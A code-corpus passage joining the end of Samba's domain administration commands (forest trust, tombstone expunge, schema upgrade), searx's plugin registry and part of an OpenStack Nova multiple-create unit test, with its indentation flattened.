r.flags = 0
r.time = 0
r.forest_trust_data.string = tln_ex
entries = []
entries.extend(update_forest_info.entries)
entries.insert(idx + 1, r)
update_forest_info.count = len(entries)
update_forest_info.entries = entries
for tln_ex in delete_tln_ex:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX:
continue
if r.forest_trust_data.string.lower() != tln_ex.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-tln-ex" % tln_ex)
entries = []
entries.extend(update_forest_info.entries)
entries.pop(idx)
update_forest_info.count = len(entries)
update_forest_info.entries = entries
for nb in enable_nb:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.netbios_domain_name.string.upper() != nb.upper():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --enable-nb" % nb)
if not update_forest_info.entries[idx].flags & lsa.LSA_NB_DISABLED_MASK:
raise CommandError("Entry found for value[%s] specified for --enable-nb is already enabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_NB_DISABLED_MASK
for nb in disable_nb:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.netbios_domain_name.string.upper() != nb.upper():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-nb" % nb)
if update_forest_info.entries[idx].flags & lsa.LSA_NB_DISABLED_ADMIN:
raise CommandError("Entry found for value[%s] specified for --disable-nb is already disabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_NB_DISABLED_MASK
update_forest_info.entries[idx].flags |= lsa.LSA_NB_DISABLED_ADMIN
for sid in enable_sid:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.domain_sid != sid:
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --enable-sid" % sid)
if not update_forest_info.entries[idx].flags & lsa.LSA_SID_DISABLED_MASK:
raise CommandError("Entry found for value[%s] specified for --enable-sid is already enabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_SID_DISABLED_MASK
for sid in disable_sid:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.domain_sid != sid:
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-sid" % sid)
if update_forest_info.entries[idx].flags & lsa.LSA_SID_DISABLED_ADMIN:
raise CommandError("Entry found for value[%s] specified for --disable-sid is already disabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_SID_DISABLED_MASK
update_forest_info.entries[idx].flags |= lsa.LSA_SID_DISABLED_ADMIN
try:
update_forest_collision = local_lsa.lsaRSetForestTrustInformation(local_policy,
local_tdo_info.domain_name,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
update_forest_info, 0)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.outf.write("Updated forest trust information...\n")
self.write_forest_trust_info(update_forest_info,
tln=local_tdo_info.domain_name.string,
collisions=update_forest_collision)
try:
lsaString = lsa.String()
lsaString.string = local_tdo_info.domain_name.string
stored_forest_info = local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation() failed")
self.outf.write("Stored forest trust information...\n")
self.write_forest_trust_info(stored_forest_info,
tln=local_tdo_info.domain_name.string)
return
class cmd_domain_tombstones_expunge(Command):
"""Expunge tombstones from the database.
This command expunges tombstones from the database."""
synopsis = "%prog NC [NC [...]] [options]"
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("--current-time",
help="The current time to evaluate the tombstone lifetime from, expressed as YYYY-MM-DD",
type=str),
Option("--tombstone-lifetime", help="Number of days a tombstone should be preserved for", type=int),
]
takes_args = ["nc*"]
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
def run(self, *ncs, **kwargs):
sambaopts = kwargs.get("sambaopts")
credopts = kwargs.get("credopts")
H = kwargs.get("H")
current_time_string = kwargs.get("current_time")
tombstone_lifetime = kwargs.get("tombstone_lifetime")
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
if current_time_string is not None:
current_time_obj = time.strptime(current_time_string, "%Y-%m-%d")
current_time = int(time.mktime(current_time_obj))
else:
current_time = int(time.time())
if len(ncs) == 0:
res = samdb.search(expression="", base="", scope=ldb.SCOPE_BASE,
attrs=["namingContexts"])
ncs = []
for nc in res[0]["namingContexts"]:
ncs.append(str(nc))
else:
ncs = list(ncs)
started_transaction = False
try:
samdb.transaction_start()
started_transaction = True
(removed_objects,
removed_links) = samdb.garbage_collect_tombstones(ncs,
current_time=current_time,
tombstone_lifetime=tombstone_lifetime)
except Exception as err:
if started_transaction:
samdb.transaction_cancel()
raise CommandError("Failed to expunge / garbage collect tombstones", err)
samdb.transaction_commit()
self.outf.write("Removed %d objects and %d links successfully\n"
% (removed_objects, removed_links))
class cmd_domain_trust(SuperCommand):
"""Domain and forest trust management."""
subcommands = {}
subcommands["list"] = cmd_domain_trust_list()
subcommands["show"] = cmd_domain_trust_show()
subcommands["create"] = cmd_domain_trust_create()
subcommands["delete"] = cmd_domain_trust_delete()
subcommands["validate"] = cmd_domain_trust_validate()
subcommands["namespaces"] = cmd_domain_trust_namespaces()
class cmd_domain_tombstones(SuperCommand):
"""Domain tombstone and recycled object management."""
subcommands = {}
subcommands["expunge"] = cmd_domain_tombstones_expunge()
class ldif_schema_update:
"""Helper class for applying LDIF schema updates"""
def __init__(self):
self.is_defunct = False
self.unknown_oid = None
self.dn = None
self.ldif = ""
def can_ignore_failure(self, error):
"""Checks if we can safely ignore failure to apply an LDIF update"""
(num, errstr) = error.args
# Microsoft has marked objects as defunct that Samba doesn't know about
if num == ldb.ERR_NO_SUCH_OBJECT and self.is_defunct:
print("Defunct object %s doesn't exist, skipping" % self.dn)
return True
elif self.unknown_oid is not None:
print("Skipping unknown OID %s for object %s" % (self.unknown_oid, self.dn))
return True
return False
def apply(self, samdb):
"""Applies a single LDIF update to the schema"""
try:
try:
samdb.modify_ldif(self.ldif, controls=['relax:0'])
except ldb.LdbError as e:
if e.args[0] == ldb.ERR_INVALID_ATTRIBUTE_SYNTAX:
# REFRESH after a failed change
# Otherwise the OID-to-attribute mapping in
# _apply_updates_in_file() won't work, because it
# can't lookup the new OID in the schema
samdb.set_schema_update_now()
samdb.modify_ldif(self.ldif, controls=['relax:0'])
else:
raise
except ldb.LdbError as e:
if self.can_ignore_failure(e):
return 0
else:
print("Exception: %s" % e)
print("Encountered while trying to apply the following LDIF")
print("----------------------------------------------------")
print("%s" % self.ldif)
raise
return 1
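# Illustrative use of ldif_schema_update (a sketch, not taken from the module
# itself; 'samdb' and the DN below are placeholders): a driver fills in .ldif
# and .dn while parsing a file, then calls apply().
#
#   op = ldif_schema_update()
#   op.dn = 'CN=someAttr,CN=Schema,CN=Configuration,DC=example,DC=com'
#   op.ldif = 'dn: %s\nchangetype: modify\n...' % op.dn
#   count = op.apply(samdb)   # 1 if applied, 0 if the failure could be ignored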
class cmd_domain_schema_upgrade(Command):
"""Domain schema upgrading"""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"), # unused
Option("-v", "--verbose", help="Be verbose", action="store_true"),
Option("--schema", type="choice", metavar="SCHEMA",
choices=["2012", "2012_R2"],
help="The schema file to upgrade to. Default is (Windows) 2012_R2.",
default="2012_R2"),
Option("--ldf-file", type=str, default=None,
help="Just apply the schema updates in the adprep/.LDF file(s) specified"),
Option("--base-dir", type=str, default=None,
help="Location of ldf files Default is ${SETUPDIR}/adprep.")
]
def _apply_updates_in_file(self, samdb, ldif_file):
"""
Applies a series of updates specified in an .LDIF file. The .LDIF file
is based on the adprep Schema updates provided by Microsoft.
"""
count = 0
ldif_op = ldif_schema_update()
# parse the file line by line and work out each update operation to apply
for line in ldif_file:
line = line.rstrip()
# the operations in the .LDIF file are separated by blank lines. If
# we hit a blank line, try to apply the update we've parsed so far
if line == '':
# keep going if we haven't parsed anything yet
if ldif_op.ldif == '':
continue
# Apply the individual change
count += ldif_op.apply(samdb)
# start storing the next operation from scratch again
ldif_op = ldif_schema_update()
continue
# replace the placeholder domain name in the .ldif file with the real domain
if line.upper().endswith('DC=X'):
line = line[:-len('DC=X')] + str(samdb.get_default_basedn())
elif line.upper().endswith('CN=X'):
line = line[:-len('CN=X')] + str(samdb.get_default_basedn())
values = line.split(':')
if values[0].lower() == 'dn':
ldif_op.dn = values[1].strip()
# replace the Windows-specific operation with the Samba one
if values[0].lower() == 'changetype':
line = line.lower().replace(': ntdsschemaadd',
': add')
line = line.lower().replace(': ntdsschemamodify',
': modify')
if values[0].lower() in ['rdnattid', 'subclassof',
'systemposssuperiors',
'systemmaycontain',
'systemauxiliaryclass']:
_, value = values
# The Microsoft updates contain some OIDs we don't recognize.
# Query the DB to see if we can work out the OID this update is
# referring to. If we find a match, then replace the OID with
# the ldapDisplayname
if '.' in value:
res = samdb.search(base=samdb.get_schema_basedn(),
expression="(|(attributeId=%s)(governsId=%s))" %
(value, value),
attrs=['ldapDisplayName'])
if len(res) != 1:
ldif_op.unknown_oid = value
else:
display_name = str(res[0]['ldapDisplayName'][0])
line = line.replace(value, ' ' + display_name)
# Microsoft has marked objects as defunct that Samba doesn't know about
if values[0].lower() == 'isdefunct' and values[1].strip().lower() == 'true':
ldif_op.is_defunct = True
# Samba has added the showInAdvancedViewOnly attribute to all objects,
# so rather than doing an add, we need to do a replace
if values[0].lower() == 'add' and values[1].strip().lower() == 'showinadvancedviewonly':
line = 'replace: showInAdvancedViewOnly'
# Add the line to the current LDIF operation (including the newline
# we stripped off at the start of the loop)
ldif_op.ldif += line + '\n'
return count
def _apply_update(self, samdb, update_file, base_dir):
"""Wrapper function for parsing an LDIF file and applying the updates"""
print("Applying %s updates..." % update_file)
ldif_file = None
try:
ldif_file = open(os.path.join(base_dir, update_file))
count = self._apply_updates_in_file(samdb, ldif_file)
finally:
if ldif_file:
ldif_file.close()
print("%u changes applied" % count)
return count
def run(self, **kwargs):
try:
from samba.ms_schema_markdown import read_ms_markdown
except ImportError as e:
self.outf.write("Exception in importing markdown: %s" % e)
raise CommandError('Failed to import module markdown')
from samba.schema import Schema
updates_allowed_overridden = False
sambaopts = kwargs.get("sambaopts")
credopts = kwargs.get("credopts")
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
H = kwargs.get("H")
target_schema = kwargs.get("schema")
ldf_files = kwargs.get("ldf_file")
base_dir = kwargs.get("base_dir")
temp_folder = None
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
# we're not going to get far if the config doesn't allow schema updates
if lp.get("dsdb:schema update allowed") is None:
lp.set("dsdb:schema update allowed", "yes")
print("Temporarily overriding 'dsdb:schema update allowed' setting")
updates_allowed_overridden = True
own_dn = ldb.Dn(samdb, samdb.get_dsServiceName())
master = get_fsmo_roleowner(samdb, str(samdb.get_schema_basedn()),
'schema')
if own_dn != master:
raise CommandError("This server is not the schema master.")
# if specific LDIF files were specified, just apply them
if ldf_files:
schema_updates = ldf_files.split(",")
else:
schema_updates = []
# work out the version of the target schema we're upgrading to
end = Schema.get_version(target_schema)
# work out the version of the schema we're currently using
res = samdb.search(base=samdb.get_schema_basedn(),
scope=ldb.SCOPE_BASE, attrs=['objectVersion'])
if len(res) != 1:
raise CommandError('Could not determine current schema version')
start = int(res[0]['objectVersion'][0]) + 1
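        # objectVersion tracks the AD schema version (for reference, 47 is
        # 2008 R2, 56 is 2012 and 69 is 2012 R2), so the first update file to
        # apply is Sch<current version + 1>.ldf.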
diff_dir = setup_path("adprep/WindowsServerDocs")
if base_dir is None:
# Read from the Schema-Updates.md file
temp_folder = tempfile.mkdtemp()
update_file = setup_path("adprep/WindowsServerDocs/Schema-Updates.md")
try:
read_ms_markdown(update_file, temp_folder)
except Exception as e:
print("Exception in markdown parsing: %s" % e)
shutil.rmtree(temp_folder)
raise CommandError('Failed to upgrade schema')
base_dir = temp_folder
for version in range(start, end + 1):
update = 'Sch%d.ldf' % version
schema_updates.append(update)
# Apply patches if we parsed the Schema-Updates.md file
diff = os.path.abspath(os.path.join(diff_dir, update + '.diff'))
if temp_folder and os.path.exists(diff):
try:
p = subprocess.Popen(['patch', update, '-i', diff],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=temp_folder)
except (OSError, IOError):
shutil.rmtree(temp_folder)
raise CommandError("Failed to upgrade schema. Check if 'patch' is installed.")
stdout, stderr = p.communicate()
if p.returncode:
print("Exception in patch: %s\n%s" % (stdout, stderr))
shutil.rmtree(temp_folder)
raise CommandError('Failed to upgrade schema')
print("Patched %s using %s" % (update, diff))
if base_dir is None:
base_dir = setup_path("adprep")
samdb.transaction_start()
count = 0
error_encountered = False
try:
# Apply the schema updates needed to move to the new schema version
for ldif_file in schema_updates:
count += self._apply_update(samdb, ldif_file, base_dir)
if count > 0:
samdb.transaction_commit()
print("Schema successfully updated")
else:
print("No changes applied to schema")
samdb.transaction_cancel()
except Exception as e:
print("Exception: %s" % e)
print("Error encountered, aborting schema upgrade")
samdb.transaction_cancel()
error_encountered = True
if updates_allowed_overridden:
lp.set("dsdb:schema update allowed", "no")
if temp_folder:
shutil.rmtree(temp_folder)
if error_encountered:
raise CommandError('Failed to upgrade schema')
class cmd_domain_functional_prep(Command):
"""Domain functional level preparation"""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
Option("-v", "--verbose", help="Be verbose", action="store_true"),
Option("--function-level", type="choice", metavar="FUNCTION_LEVEL",
choices=["2008_R2", "2012", "2012_R2"],
help="The schema file to upgrade to. Default is (Windows) 2012_R2.",
default="2012_R2"),
Option("--forest-prep", action="store_true",
help="Run the forest prep (by default, both the domain and forest prep are run)."),
Option("--domain-prep", action="store_true",
help="Run the domain prep (by default, both the domain and forest prep are run).")
]
def run(self, **kwargs):
updates_allowed_overridden = False
sambaopts = kwargs.get("sambaopts")
credopts = kwargs.get("credopts")
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
H = kwargs.get("H")
target_level = string_version_to_constant[kwargs.get("function_level")]
forest_prep = kwargs.get("forest_prep")
domain_prep = kwargs.get("domain_prep")
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
# we're not going to get far if the config doesn't allow schema updates
if lp.get("dsdb:schema update allowed") is None:
lp.set("dsdb:schema update allowed", "yes")
print("Temporarily overriding 'dsdb:schema update allowed' setting")
updates_allowed_overridden = True
if forest_prep is None and domain_prep is None:
forest_prep = True
domain_prep = True
own_dn = ldb.Dn(samdb, samdb.get_dsServiceName())
if forest_prep:
master = get_fsmo_roleowner(samdb, str(samdb.get_schema_basedn()),
'schema')
if own_dn != master:
raise CommandError("This server is not the schema master.")
if domain_prep:
domain_dn = samdb.domain_dn()
infrastructure_dn = "CN=Infrastructure," + domain_dn
master = get_fsmo_roleowner(samdb, infrastructure_dn,
'infrastructure')
if own_dn != master:
raise CommandError("This server is not the infrastructure master.")
if forest_prep:
samdb.transaction_start()
error_encountered = False
try:
from samba.forest_update import ForestUpdate
forest = ForestUpdate(samdb, fix=True)
forest.check_updates_iterator([53, 79, 80, 81, 82, 83])
forest.check_updates_functional_level(target_level,
DS_DOMAIN_FUNCTION_2008_R2,
update_revision=True)
samdb.transaction_commit()
except Exception as e:
print("Exception: %s" % e)
samdb.transaction_cancel()
error_encountered = True
if domain_prep:
samdb.transaction_start()
error_encountered = False
try:
from samba.domain_update import DomainUpdate
domain = DomainUpdate(samdb, fix=True)
domain.check_updates_functional_level(target_level,
DS_DOMAIN_FUNCTION_2008,
update_revision=True)
samdb.transaction_commit()
except Exception as e:
print("Exception: %s" % e)
samdb.transaction_cancel()
error_encountered = True
if updates_allowed_overridden:
lp.set("dsdb:schema update allowed", "no")
if error_encountered:
raise CommandError('Failed to perform functional prep')
class cmd_domain(SuperCommand):
"""Domain management."""
subcommands = {}
subcommands["demote"] = cmd_domain_demote()
if cmd_domain_export_keytab is not None:
subcommands["exportkeytab"] = cmd_domain_export_keytab()
subcommands["info"] = cmd_domain_info()
subcommands["provision"] = cmd_domain_provision()
subcommands["join"] = cmd_domain_join()
subcommands["dcpromo"] = cmd_domain_dcpromo()
subcommands["level"] = cmd_domain_level()
subcommands["passwordsettings"] = cmd_domain_passwordsettings()
subcommands["classicupgrade"] = cmd_domain_classicupgrade()
subcommands["samba3upgrade"] = cmd_domain_samba3upgrade()
subcommands["trust"] = cmd_domain_trust()
subcommands["tombstones"] = cmd_domain_tombstones()
subcommands["schemaupgrade"] = cmd_domain_schema_upgrade()
subcommands["functionalprep"] = cmd_domain_functional_prep()
subcommands["backup"] = cmd_domain_backup()
|
kernevil/samba
|
python/samba/netcmd/domain.py
|
Python
|
gpl-3.0
| 197,686
|
'''
searx is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
searx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with searx. If not, see < http://www.gnu.org/licenses/ >.
(C) 2015 by Adam Tauber, <asciimoo@gmail.com>
'''
from sys import exit
from searx import logger
logger = logger.getChild('plugins')
from searx.plugins import (https_rewrite,
self_info,
search_on_category_select,
tracker_url_remover)
required_attrs = (('name', str),
('description', str),
('default_on', bool))
optional_attrs = (('js_dependencies', tuple),
('css_dependencies', tuple))
class Plugin():
default_on = False
name = 'Default plugin'
description = 'Default plugin description'
class PluginStore():
def __init__(self):
self.plugins = []
def __iter__(self):
for plugin in self.plugins:
yield plugin
def register(self, *plugins):
for plugin in plugins:
for plugin_attr, plugin_attr_type in required_attrs:
if not hasattr(plugin, plugin_attr) or not isinstance(getattr(plugin, plugin_attr), plugin_attr_type):
logger.critical('missing attribute "{0}", cannot load plugin: {1}'.format(plugin_attr, plugin))
exit(3)
for plugin_attr, plugin_attr_type in optional_attrs:
if not hasattr(plugin, plugin_attr) or not isinstance(getattr(plugin, plugin_attr), plugin_attr_type):
setattr(plugin, plugin_attr, plugin_attr_type())
plugin.id = plugin.name.replace(' ', '_')
self.plugins.append(plugin)
def call(self, plugin_type, request, *args, **kwargs):
ret = True
for plugin in request.user_plugins:
if hasattr(plugin, plugin_type):
ret = getattr(plugin, plugin_type)(request, *args, **kwargs)
if not ret:
break
return ret
plugins = PluginStore()
plugins.register(https_rewrite)
plugins.register(self_info)
plugins.register(search_on_category_select)
plugins.register(tracker_url_remover)
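# Minimal plugin sketch (illustrative only; the class and hook name below are
# hypothetical): anything carrying the required attributes can be registered,
# and hooks are plain callables that call() looks up by name on each plugin.
#
#   class MyPlugin:
#       name = 'My plugin'
#       description = 'Example plugin'
#       default_on = False
#
#       def post_search(self, request, ctx):
#           return True   # returning False stops the plugin chain
#
#   plugins.register(MyPlugin())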
|
framasoft/searx
|
searx/plugins/__init__.py
|
Python
|
agpl-3.0
| 2,646
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid
from oslo_config import cfg
import webob
from nova.api.openstack.compute import plugins
from nova.api.openstack.compute.plugins.v3 import block_device_mapping as \
block_device_mapping_v21
from nova.api.openstack.compute.plugins.v3 import multiple_create as \
multiple_create_v21
from nova.api.openstack.compute.plugins.v3 import servers as servers_v21
from nova.api.openstack.compute import servers as servers_v20
from nova.api.openstack import extensions as extensions_v20
from nova.compute import api as compute_api
from nova.compute import flavors
from nova import db
from nova import exception
from nova.network import manager
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake
CONF = cfg.CONF
FAKE_UUID = fakes.FAKE_UUID
def fake_gen_uuid():
return FAKE_UUID
def return_security_group(context, instance_id, security_group_id):
pass
class MultiCreateExtensionTestV21(test.TestCase):
validation_error = exception.ValidationError
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(MultiCreateExtensionTestV21, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers_v21.ServersController(
extension_info=ext_info)
CONF.set_override('extensions_blacklist', 'os-multiple-create',
'osapi_v3')
self.no_mult_create_controller = servers_v21.ServersController(
extension_info=ext_info)
def instance_create(context, inst):
inst_type = flavors.get_flavor_by_flavor_id(3)
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
def_image_ref = 'http://localhost/images/%s' % image_uuid
self.instance_cache_num += 1
instance = fake_instance.fake_db_instance(**{
'id': self.instance_cache_num,
'display_name': inst['display_name'] or 'test',
'uuid': FAKE_UUID,
'instance_type': inst_type,
'access_ip_v4': '1.2.3.4',
'access_ip_v6': 'fead::1234',
'image_ref': inst.get('image_ref', def_image_ref),
'user_id': 'fake',
'project_id': 'fake',
'reservation_id': inst['reservation_id'],
"created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
"updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
"progress": 0,
"fixed_ips": [],
"task_state": "",
"vm_state": "",
"security_groups": inst['security_groups'],
})
self.instance_cache_by_id[instance['id']] = instance
self.instance_cache_by_uuid[instance['uuid']] = instance
return instance
def instance_get(context, instance_id):
"""Stub for compute/api create() pulling in instance after
scheduling
"""
return self.instance_cache_by_id[instance_id]
def instance_update(context, uuid, values):
instance = self.instance_cache_by_uuid[uuid]
instance.update(values)
return instance
def server_update(context, instance_uuid, params,
columns_to_join=None):
inst = self.instance_cache_by_uuid[instance_uuid]
inst.update(params)
return (inst, inst)
def fake_method(*args, **kwargs):
pass
def project_get_networks(context, user_id):
return dict(id='1', host='localhost')
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
fakes.stub_out_nw_api(self.stubs)
self.stubs.Set(uuid, 'uuid4', fake_gen_uuid)
self.stubs.Set(db, 'instance_add_security_group',
return_security_group)
self.stubs.Set(db, 'project_get_networks',
project_get_networks)
self.stubs.Set(db, 'instance_create', instance_create)
self.stubs.Set(db, 'instance_system_metadata_update',
fake_method)
self.stubs.Set(db, 'instance_get', instance_get)
self.stubs.Set(db, 'instance_update', instance_update)
self.stubs.Set(db, 'instance_update_and_get_original',
server_update)
self.stubs.Set(manager.VlanManager, 'allocate_fixed_ip',
fake_method)
self.req = fakes.HTTPRequest.blank('')
def _test_create_extra(self, params, no_image=False,
override_controller=None):
image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)
if no_image:
server.pop('imageRef', None)
server.update(params)
body = dict(server=server)
if override_controller:
server = override_controller.create(self.req,
body=body).obj['server']
else:
server = self.controller.create(self.req,
body=body).obj['server']
def _check_multiple_create_extension_disabled(self, **kwargs):
# NOTE: on v2.1 API, "create a server" API doesn't add the following
        # attributes into kwargs when the multiple_create extension is not loaded.
# However, v2.0 API adds them as values "1" instead. So we need to
# define checking methods for each API here.
self.assertNotIn('min_count', kwargs)
self.assertNotIn('max_count', kwargs)
def test_create_instance_with_multiple_create_disabled(self):
min_count = 2
max_count = 3
params = {
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count,
multiple_create_v21.MAX_ATTRIBUTE_NAME: max_count,
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self._check_multiple_create_extension_disabled(**kwargs)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(
params,
override_controller=self.no_mult_create_controller)
def test_multiple_create_with_string_type_min_and_max(self):
min_count = '2'
max_count = '3'
params = {
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count,
multiple_create_v21.MAX_ATTRIBUTE_NAME: max_count,
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertIsInstance(kwargs['min_count'], int)
self.assertIsInstance(kwargs['max_count'], int)
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(kwargs['max_count'], 3)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
def test_create_instance_with_multiple_create_enabled(self):
min_count = 2
max_count = 3
params = {
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count,
multiple_create_v21.MAX_ATTRIBUTE_NAME: max_count,
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(kwargs['max_count'], 3)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
def test_create_instance_invalid_negative_min(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: -1,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_negative_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: -1,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_with_blank_min(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: '',
'name': 'server_test',
'image_ref': image_href,
'flavor_ref': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_with_blank_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: '',
'name': 'server_test',
'image_ref': image_href,
'flavor_ref': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_min_greater_than_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 4,
multiple_create_v21.MAX_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_alpha_min(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 'abcd',
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_alpha_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: 'abcd',
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_multiple_instances(self):
"""Test creating multiple instances but not asking for
reservation_id
"""
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
res = self.controller.create(self.req, body=body).obj
self.assertEqual(FAKE_UUID, res["server"]["id"])
self._check_admin_password_len(res["server"])
def test_create_multiple_instances_pass_disabled(self):
"""Test creating multiple instances but not asking for
reservation_id
"""
self.flags(enable_instance_password=False)
